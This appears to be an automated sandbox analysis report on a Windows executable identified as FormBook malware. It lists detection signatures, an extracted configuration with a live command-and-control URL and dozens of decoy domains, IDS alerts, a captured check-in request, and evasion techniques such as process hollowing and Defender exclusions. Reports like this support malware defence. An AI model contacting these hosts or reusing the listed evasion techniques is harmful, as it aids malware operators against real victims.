Windows Analysis Report
RFQ 245801.exe

Overview

General Information

Sample name: RFQ 245801.exe
Analysis ID: 1528045
MD5: 4be29153bc863fa6d2914aab9759e6aa
SHA1: eb30dab7d18b7bbf2673573cc96da82f6374d85b
SHA256: ffaa78a8a97885716e7dbe2a4a7ed9e1593ea5690f02f79f5d63c9b4964559da
Tags: exeuser-Maciej8910871
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
Multi AV Scanner detection for submitted file
Source: RFQ 245801.exe ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: RFQ 245801.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: RFQ 245801.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RFQ 245801.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 4x nop then jmp 07339222h 0_2_07339684
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 4x nop then jmp 07339222h 0_2_0733989E

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.ridges-freezers-56090.bond/c24t/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1Host: www.j88.travelConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA8F82 getaddrinfo,setsockopt,recv, 6_2_0FBA8F82
Source: global traffic HTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1Host: www.j88.travelConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic DNS traffic detected: DNS query: www.j88.travel
Source: global traffic DNS traffic detected: DNS query: www.venir-bienne.info
Source: global traffic DNS traffic detected: DNS query: www.ridges-freezers-56090.bond
Source: global traffic DNS traffic detected: DNS query: www.oko.events
Source: global traffic DNS traffic detected: DNS query: www.earing-tests-69481.bond
Source: global traffic DNS traffic detected: DNS query: www.458881233.men
Source: global traffic DNS traffic detected: DNS query: www.delark.click
Source: global traffic DNS traffic detected: DNS query: www.ilw.legal
Source: global traffic DNS traffic detected: DNS query: www.02s-pest-control-us-ze.fun
Source: global traffic DNS traffic detected: DNS query: www.sx9u.shop
Source: global traffic DNS traffic detected: DNS query: www.khizmetlergirisyapzzz2024.net
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: RFQ 245801.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RFQ 245801.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: RFQ 245801.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000006.00000002.4157692270.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4155839185.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1741977210.0000000008720000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: RFQ 245801.exe, 00000000.00000002.1746477242.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.fun
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/www.sx9u.shop
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.funReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.men
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.men/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.men/c24t/www.delark.click
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.menReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.events
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.events/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.events/c24t/www.ealerslot.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.eventsReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000003.3482833958.000000000C9B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160246853.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3112813683.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyz
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyz/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyz/c24t/www.khizmetlergirisyapzzz2024.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyzReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.click
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.click/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.click/c24t/www.ilw.legal
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.clickReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.net/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.net/c24t/www.orenzoplaybest14.xyz
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.netReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.earing-tests-69481.bond
